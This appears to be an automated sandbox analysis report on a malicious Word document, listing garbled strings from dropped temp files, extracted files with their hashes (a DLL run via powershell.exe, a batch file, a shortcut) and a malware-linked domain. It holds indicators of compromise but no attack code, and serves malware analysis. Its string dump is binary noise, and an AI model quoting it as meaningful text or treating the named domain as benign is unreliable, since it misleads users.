Unicode based on Runtime Data (rundll32.exe )
WpadNetworkName
Unicode based on Runtime Data (rundll32.exe )
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data (rundll32.exe )
"Hw"w P^O;<aY`GkxmPY[g
Ansi based on Dropped File (~WRD0000.tmp)
$5caa`= &!Cd,E.y6CnHgs0_?V_Nw ,{5Iq{Bl(p_cdS|&PO\UbHcK)KjVkUSD2P
Ansi based on Dropped File (~WRD0000.tmp)
%?nu gPK!/]N word/theme/theme1.xmlY;4.[?%y
Ansi based on Dropped File (~WRD0000.tmp)
'j,'u8M#8M#8M
Ansi based on Dropped File (~WRD0000.tmp)
.:N#H
Ansi based on Dropped File (~WRD0000.tmp)
.MfIZUq"=loO.Y$m.+gAT!,MQH(XI\qZbaG;_K
Ansi based on Dropped File (~WRD0000.tmp)
.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!_DMtdocProps/core.xml (RN0}7Y`$jxD^uM[w+fL|sO;"uS@J*<'\K^T0,
Ansi based on Dropped File (~WRD0000.tmp)
/x#,/d}?eh7)mg;kk4Df2/wBmw4A^#FkPHxAt~9'ozWnMtVWkJlNWz^>\PK!yUword/document.xmlVKo8/@=X'udshj)rPXF$mwuqa>fIp_lJT *_o.+T0
Ansi based on Dropped File (~WRD0000.tmp)
0/EEa}@+Du7Lcc@M+.!}!$ OuRIdHA(1x$u#Qx2R*XLOP[nDY3+L!H?%kE
Ansi based on Dropped File (~WRD0000.tmp)
1`2"7BAoGm)TrJ(A^%>f+hOO3`=VEs9kA"(-$gkm,w"F,#SC`n[J(%
Ansi based on Dropped File (~WRD0000.tmp)
433j238bG*Dc=Iod%rD\'<DbQ|
Ansi based on Dropped File (~WRD0000.tmp)
49Ds7 !|V>7rtx3iQ!V$
Ansi based on Dropped File (~WRD0000.tmp)
5(FSrgC4YTrsB,i1j!u'66@AP\?F.sNlt<>=9^Q*pOC4Jew"i3!zCIa~.4K+}ip{:Z|cIy]?pkXN2
Ansi based on Dropped File (~WRD0000.tmp)
6iD_,|uZ^ty;!Y,}{C/h>PK!|;9"word/_rels/document.xml.rels (MO0&V]5-Sht
Ansi based on Dropped File (~WRD0000.tmp)
7PXd}Wt]tsso*UM\x@wAm`8TQkPp<Nw.4875TZ(ZG[iF?h;gy)vPK!5Iword/settings.xmlVn8}/`yIoSmQ@IM7;$(ihOg~+M_FE
Ansi based on Dropped File (~WRD0000.tmp)
9;5AT7_CMjFD4x#@74x#@2x#XdmZo,To
Ansi based on Dropped File (~WRD0000.tmp)
9AMFP97ex#@CAoDD74x#@2x#XdmZo,To
Ansi based on Dropped File (~WRD0000.tmp)
9AMFPoJ5x#@07_9W%M7"q."kx#@dyx#@dmPl(xS
Ansi based on Dropped File (~WRD0000.tmp)
='I ZRPGQh6\lFXt778Co5(h5({pm[{v?~
Ansi based on Dropped File (~WRD0000.tmp)
=1d){%}wofjQr??.z/L?1Z?o)IK9Ka:6|'1M1%Y,P,#X'kD7_rH&.+$+I'<ewZ0t=G5w2(ql|FQ&Q3,=cXWXv=%3[H+
Ansi based on Dropped File (~WRD0000.tmp)
=I]B,lD@=VSk(]&(f2:tSiX30IQbU`MZ9UBrFL+b2cyP.
Ansi based on Dropped File (~WRD0000.tmp)
>`~{`PNfQS];6#6jwVt0xrQCM_-oiv
Ansi based on Dropped File (~WRD0000.tmp)
>FY!OGPRW<s@4S:>Y;^UW+Kn|6SD3EG-XVNinjkR}v!{GNGVlenomUCIw]]w-]rU|!zvzm{:BkMzfA(5'BbaPSK\-L`b$AK8JI,
Ansi based on Dropped File (~WRD0000.tmp)
>iWb[gDhzJBewmW&, fcmA@F[&G/3bj<ML@F[Kjb>g??ky.,z22pBWA=+3SA:*P.v5~ol8S-wt`LET
Ansi based on Dropped File (~WRD0000.tmp)
@%z:pov<t..P/LmTLz5qdFhMFhDFh$wD##1-\*:Zw"O(t]F=$,8epj9=\,Y"vgF;{&
Ansi based on Dropped File (~WRD0000.tmp)
\JeL{QJ*[r]SI2%x.MHNRtfgV@
Ansi based on Dropped File (~WRD0000.tmp)
]3j%L]CBr#7@>KVkZ^-d ukW.+"p!
Ansi based on Dropped File (~WRD0000.tmp)
^@5)mDYq/bfdMRMVs*Bc.cl%(r]3,R~<!
Ansi based on Dropped File (~WRD0000.tmp)
^aQFldee2nVA=t8`7M:liA%JE\F/ }D\.zrSu1FxlEmZUAs7g?d.1?{:.|hc
Ansi based on Dropped File (~WRD0000.tmp)
Bn9h{<my-'=ZFUjpTAJ?QX
Ansi based on Dropped File (~WRD0000.tmp)
bTc+28aBU64."=*+;?GNHA7K<]P;~T<x4:=GqJ.,NdTQ}<G37p,Mda03IIt$nXrgG$iXYPI%I?c5.RWlpBb5T!u7+U Kghj~5(QV
Ansi based on Dropped File (~WRD0000.tmp)
c==/6g b&*+Qb]bw*N3#_tgK}BVQ~>\'!`"7/e}x ]\+`J)nGOt:_NIW2^cU'd%#[){?PK!EOMword/fontTable.xmlj0K{2uJ6>XF7o f~f>kQU/%INU>~xVV+d`CY+m'i)M\LYPVwpv/q}wK3[3YlFVqdcG`/k(|jbg]tFNN8c(LEY-r8i68VPqNd\B@lQ=44@78Ug-^fVrlj|`c'
Ansi based on Dropped File (~WRD0000.tmp)
d%HT`r-S8d%w=d[Zh-BFU4n~]:_z0vRwq!<dqGvvrk
Ansi based on Dropped File (~WRD0000.tmp)
DZf|V.SR'H&.5SXS5tH.KbDytNH/9(12{g%?
Ansi based on Dropped File (~WRD0000.tmp)
fao.b*lIrj),l0%b
Ansi based on Dropped File (~WRD0000.tmp)
Ft#6"w9:0t[E[?N1~piMPir1/C4^C,_R&+Hd\CBwPV*h"|x0gV5iy$4V"e9BA)jT(y>vwv(SLqWUDXQw4S^0F"\gsldYdLuHc9>(hVD5{A7tPK!N_rels/.rels (JAa}7
Ansi based on Dropped File (~WRD0000.tmp)
g$mg49z'c'Yy&h-]IB[nxG!!i[1dsjT"5U$Z,K_M-sdC""h`#BE=x56f}P^Hjl9*T`<Oy`#@P~x2d$6dy%t@`'ut|+{{W>d7\iIv
Ansi based on Dropped File (~WRD0000.tmp)
g/ox(-R,vj,'I8M8M#8M
Ansi based on Dropped File (~WRD0000.tmp)
G_)Ew_9_8]ROu!}=I]?re
Ansi based on Dropped File (~WRD0000.tmp)
Gino/<<1A$>"f3\TISWY
Ansi based on Dropped File (~WRD0000.tmp)
h%IX`/*CQGw@(
Ansi based on Dropped File (~WRD0000.tmp)
h8:Bw^y5,X1Nh0`}y[eym/JDr8M)K-2}u>>uSj:7"Ff9b]sXvT)@6zKjRz}O\
Ansi based on Dropped File (~WRD0000.tmp)
h['!#EeF+Y-FWmfDPjMZ/}o"X-]=GUMEUoDD74x#@74\!7EUF+?XPU 6+fT=m#7BNPSrvP*R`#8#8#p'YV"UPaxUA!')
Ansi based on Dropped File (~WRD0000.tmp)
i../*,5zXz+ /0,TE^tw7fYEsKwH:EaO||ewV)QKQHzpd#p]y"j^}>)0d^Vwuo?fa>[U`(U}}I+
Ansi based on Dropped File (~WRD0000.tmp)
ig@X6_]7~
Ansi based on Dropped File (~WRD0000.tmp)
J(6-!FnBPFb2y(R1"I2OxfT#L
Ansi based on Dropped File (~WRD0000.tmp)
j.dR?(QxP3'J5$4v~^W=)~-}"!E?~BT5+
Ansi based on Dropped File (~WRD0000.tmp)
j.k#g,yw}*B.KO*/bUg+LO}/,zp 3j@@8*thox9cxpaA3j.p'M18nt}ynTT<91E#z[4E#Gz[4RE#z[4pv
Ansi based on Dropped File (~WRD0000.tmp)
JmoLzc<qhcN2zoa9+T-f6:Gbn~JqT[w<,97zNHs
Ansi based on Dropped File (~WRD0000.tmp)
Jv_uPK!Nword/webSettings.xmlJ1;,"t R"ivvdLjOo ^z$@_f^
Ansi based on Dropped File (~WRD0000.tmp)
K@Nm}/k
Ansi based on Dropped File (~WRD0000.tmp)
KvGDun
Ansi based on Dropped File (~WRD0000.tmp)
LUl\$^U@UO^"9Ac |K`z'r{Wi/}.'26&g\U&|qJvVPK!uwvdocProps/app.xml (RN0#QPPKj
Ansi based on Dropped File (~WRD0000.tmp)
LvVxJO<?d^YZXaTtC@^1M *#Y0^:XtX+Ix!8q{z]!cZPS"*V<m0&-<nj*4=evc,nk
Ansi based on Dropped File (~WRD0000.tmp)
O,CtU$Wq:h2]$}|z%jo4>6]>b>M8M2_f}u=fJ7lkO
Ansi based on Dropped File (~WRD0000.tmp)
PK!$[Content_Types].xml (MO@&Wz0M.C~dgJKZ23J<*kROz,#m,eEDi
Ansi based on Dropped File (~WRD0000.tmp)
PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!_DMt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0
Ansi based on Dropped File (~WRD0000.tmp)
R`parD"[2nCeun`X?x-^XiF'*1L-]3NiK^"C!FNs=g@\o^^h^^h;l/izfNpA{;$8cg]|s);O:SpJMTcaZEobb*y2"_CZ4JNLz4eQizIaL* 42@-^\MCG-&+[WFWmf$PjMZ-sunX-U=FUMt]7 '#8M#p'[VW8?8PU 6jWfT=v&Pj7NxX
Ansi based on Dropped File (~WRD0000.tmp)
S/$0O:QbgH(AZ[n)B(#1TJ4~%&.U]_oQh;;l]-e!2Y)?yh\e?e,OUxB*sP}br>aM|XKdPK!To^=word/stylesWithEffects.xmlmS8}CHp4P3m60Z|~ pV;wc]Wa<$2Z'}=,GNg}%tx>,=TcO^O2'-NhW,zb[d#`e,=$dceb%\yCj8T(G$(pk!2M$<dnDPkt+0(u=Aa`AwIW0EF9ljaH}Id[wb1MhmeI\jh)@c.7,zH&lG*}RKYd&YFYl,+_/T
Ansi based on Dropped File (~WRD0000.tmp)
s] <"w
Ansi based on Dropped File (~WRD0000.tmp)
TC(9Mj
Ansi based on Dropped File (~WRD0000.tmp)
t{-E;X6?vX&+$Hy'r}}W6]1oXWV:DzHp*\;\)4{wt%n0,vFO9cxY:Y7,N%gwY PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I
Ansi based on Dropped File (~WRD0000.tmp)
uz/l$
Ansi based on Dropped File (~WRD0000.tmp)
v`g/~{_Mc4(i%a)S.Lp)D^i)XKf\m
Ansi based on Dropped File (~WRD0000.tmp)
w".4kj,g6_WyF!#G2>
Ansi based on Dropped File (~WRD0000.tmp)
W=8}L$mNz7"T-ur_(/IuvX?z~6po+Ua/
Ansi based on Dropped File (~WRD0000.tmp)
Z,P6vO[f6C=\f{Ya)7$vj?G(a
Ansi based on Dropped File (~WRD0000.tmp)
zk7^U}p'6XpgE3/,\hv.KDY
Ansi based on Dropped File (~WRD0000.tmp)
zMU=ZNz@*Qba@r"M:y+0Ow2}oIc,XP@&DBAIJqD(
Ansi based on Dropped File (~WRD0000.tmp)
|sJXOI|x"Ef.2%>>2S^Xb)?w.E"drtz]"=Z^Xcf8bm$$<R6g./
Ansi based on Dropped File (~WRD0000.tmp)
~%0uJNGr:E/6|,doJkF`
Ansi based on Dropped File (~WRD0000.tmp)
~xM`ijU <8PU 6o#\vMST';@5:k&017qq.bkx@lypx@lmla(y{%]
Ansi based on Dropped File (~WRD0000.tmp)
~xM`ijU <8PU 6o\vMSTs;@5oex@KA##8M
Ansi based on Dropped File (~WRD0000.tmp)
~xM`ijU <8PU |
Ansi based on Dropped File (~WRD0000.tmp)
.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!=lgtdocProps/core.xml (RN0}7YH$o@e0{V{6}WeTTz=%y|G"5LW0-<
Ansi based on Dropped File (~WRD0002.tmp)
\JeL{Q*Fj[q]SIrK+\ri+^%%J@{G3r?hR[ozb4f@/^Uc""P|}~6}1oV:DHp*;\)4{uw%n0,vB9)MbdY:]}0,N%d7I 4PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I
Ansi based on Dropped File (~WRD0002.tmp)
PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!=lgt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0
Ansi based on Dropped File (~WRD0002.tmp)

Extracted Files

Displaying 22 extracted file(s). The remaining 8 file(s) are available in the full version and XML/JSON reports.

  • Informative Selection 2

    • mvdrt.dll
      Size
      32KiB (32256 bytes)
      Type
      pedll executable
      Description
      PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Runtime Process
      powershell.exe (PID: 1420)
      MD5
      1c6f8eba504f2f429abf362626545c79
      SHA1
      ab354807e687993fbeb1b325eb6e4ab38d428a1e
      SHA256
      3ac11a74275725a22c233cd974229d2b167c336da667410f7262b4926dabd31b
    • carved_0.dll
      Size
      32KiB (32256 bytes)
      Type
      pedll executable
      Description
      PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Context
      sendmevideo.org
      MD5
      1c6f8eba504f2f429abf362626545c79
      SHA1
      ab354807e687993fbeb1b325eb6e4ab38d428a1e
      SHA256
      3ac11a74275725a22c233cd974229d2b167c336da667410f7262b4926dabd31b
  • Informative 20

    • mvdrt.bat
      Size
      112B (112 bytes)
      Type
      text
      Description
      ASCII text, with CRLF line terminators
      Runtime Process
      powershell.exe (PID: 1420)
      MD5
      a3a550cd29ecf1ffa7cf2920f4be543c
      SHA1
      6ef7de33cb8b34e4b80eebaec49910d389046d3f
      SHA256
      7ece2a9bb6e4690126ae90bdcd4e02ac05685047c5ba0a011ddcb6f95c3fa6da
    • 759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.LNK
      Size
      738B (738 bytes)
      Type
      lnk
      Description
      MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 2 13:08:22 2017, mtime=Thu Nov 2 17:47:17 2017, atime=Thu Nov 2 17:47:18 2017, length=13185, window=hide
      Runtime Process
      WINWORD.EXE (PID: 3996)
      MD5
      be42f09943ce1cc5047e11494247201f
      SHA1
      fd43a8876ca72e20dc6222fff32eae51630bf922
      SHA256
      76b6d4f1c82f8aefd737808840edf40354c336e8ba0550c50f51c6c0c10308c5
    • ~$Normal.dotm
      Size
      162B (162 bytes)
      Type
      data
      Runtime Process
      WINWORD.EXE (PID: 3996)
      MD5
      765c22b82b755fcfcd7ed47b97ae5dae
      SHA1
      6cba9ef5257dade7d70a6508949cf3c63265802b
      SHA256
      ede67337c48c9cc5f39d20bfb5a70840730ec19ecd0cc354a8ce63830a3b386e
    • index.dat
      Size
      250B (250 bytes)
      Type
      data
      Runtime Process
      WINWORD.EXE (PID: 3996)
      MD5
      bb79a624f04623e9501ae7f390bfcf94
      SHA1
      d3266a25855d8762d359fdc8618bceeeb1029a8e
      SHA256
      d686c5cb30fba401707e57b7488e941084281baf671c5af31f218f656497eda5
    • 4NTW3LFLLHXVE8FQ8F06.temp
      Size
      7.8KiB (8016 bytes)
      Type
      data
      Runtime Process
      powershell.exe (PID: 2460)
      MD5
      c0f4559960a60a4098068c7b547417d1
      SHA1
      5e2656c0cbc8237cfbe423a9ebe5b603bf813639
      SHA256
      7c5b363d9f41bf03600bebac01867e583d449553c527e464c6ea1627175a2a7d
    • 6XYB45E3V9BXA69467UK.temp
      Size
      7.8KiB (8016 bytes)
      Type
      data
      Runtime Process
      powershell.exe (PID: 1420)
      MD5
      c0f4559960a60a4098068c7b547417d1
      SHA1
      5e2656c0cbc8237cfbe423a9ebe5b603bf813639
      SHA256
      7c5b363d9f41bf03600bebac01867e583d449553c527e464c6ea1627175a2a7d
    • 5Vqlj[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • 9igAhnH[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • IBG0sw[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • Kn[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • TLSMSL[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • VRzZ5.vnd[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • j[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • sNSv.vnd.etsi[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • wY6U6e[1].txt
      Size
      69B (69 bytes)
      Type
      text
      Description
      ASCII text, with no line terminators
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      a0eac91ee2b09b1ec8bcae438fac0fc8
      SHA1
      e2fe81fcaefcb4a98cc08de6cb7efa34273726cd
      SHA256
      025047cadffc03859a074fe58c5535e893ddfc6917cb2d8044ef6fbb4fb590f2
    • ~WRS{3147DD3C-8AE0-4C18-B784-2B1DFD761C56}.tmp
      Size
      2.1KiB (2168 bytes)
      Type
      unknown
      Description
      FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
      Runtime Process
      WINWORD.EXE (PID: 3996)
      MD5
      474297e9e92801128407b7c46517bd71
      SHA1
      48d8d95d3fc27f54012f6b413037c9819f24722c
      SHA256
      367b5aa09b488ffa37d65c11941f26da15036f20053a1ff822647dd76c5e33c7
    • ~WRS{5FE00026-8FA9-4B7B-B1BA-06FE85B7A820}.tmp
      Size
      1KiB (1024 bytes)
      Type
      unknown
      Description
      FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
      Runtime Process
      WINWORD.EXE (PID: 3996)
      MD5
      5d4d94ee7e06bbb0af9584119797b23a
      SHA1
      dbb111419c704f116efa8e72471dd83e86e49677
      SHA256
      4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
    • 94308059B57B3142E455B38A6EB92015
      Size
      53KiB (53978 bytes)
      Type
      data
      Description
      Microsoft Cabinet archive data, 53978 bytes, 1 file
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      03f9e1f45c0d5fe8e08af7449ba1fa2f
      SHA1
      da545c3133a914434cce940bae78d8ad180a529a
      SHA256
      677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
    • Cab7CC9.tmp
      Size
      50KiB (50939 bytes)
      Type
      data
      Description
      Microsoft Cabinet archive data, 50939 bytes, 1 file
      Runtime Process
      rundll32.exe (PID: 1968)
      MD5
      41f958d2d3e9ed4504b6a8863fd72b49
      SHA1
      f6d380b256b0e66ef347adc78195fd0f228b3e33
      SHA256
      c929701c67a05f90827563eedccf5eba8e65b2da970189a0371f28cd896708b8
    • ~$9fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx
      Size
      162B (162 bytes)
      Type
      data
      Runtime Process
      WINWORD.EXE (PID: 3996)
      MD5
      765c22b82b755fcfcd7ed47b97ae5dae
      SHA1
      6cba9ef5257dade7d70a6508949cf3c63265802b
      SHA256
      ede67337c48c9cc5f39d20bfb5a70840730ec19ecd0cc354a8ce63830a3b386e

Notifications

  • Runtime

  • Added comment to Virus Total report
  • Extracted file "mvdrt.bat" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/7ece2a9bb6e4690126ae90bdcd4e02ac05685047c5ba0a011ddcb6f95c3fa6da/analysis/1509628528/")
  • Extracted file "mvdrt.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/3ac11a74275725a22c233cd974229d2b167c336da667410f7262b4926dabd31b/analysis/1509628530/")
  • Extracted file "~$9fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/ede67337c48c9cc5f39d20bfb5a70840730ec19ecd0cc354a8ce63830a3b386e/analysis/1509628529/")
  • Extracted file "~WRD0000.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/302a673ba0b25c50f374c89c46ba244d3686d510f77578a8d5b0a62ff485a954/analysis/1509628531/")
  • Extracted file "~WRD0002.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/c05bd7e1c08e0a73a6e203bd0f15f898846abd74f37f586e0e567479872103f1/analysis/1509628532/")
  • Not all IP/URL string resources were checked online
  • Not all file accesses are visible for powershell.exe (PID: 1420)
  • Not all file accesses are visible for powershell.exe (PID: 2460)
  • Not all sources for signature ID "api-55" are available in the report
  • Not all sources for signature ID "binary-0" are available in the report
  • Not all sources for signature ID "hooks-8" are available in the report
  • Not all sources for signature ID "mutant-0" are available in the report
  • Not all sources for signature ID "registry-17" are available in the report
  • Not all sources for signature ID "registry-18" are available in the report
  • Not all sources for signature ID "registry-25" are available in the report

Community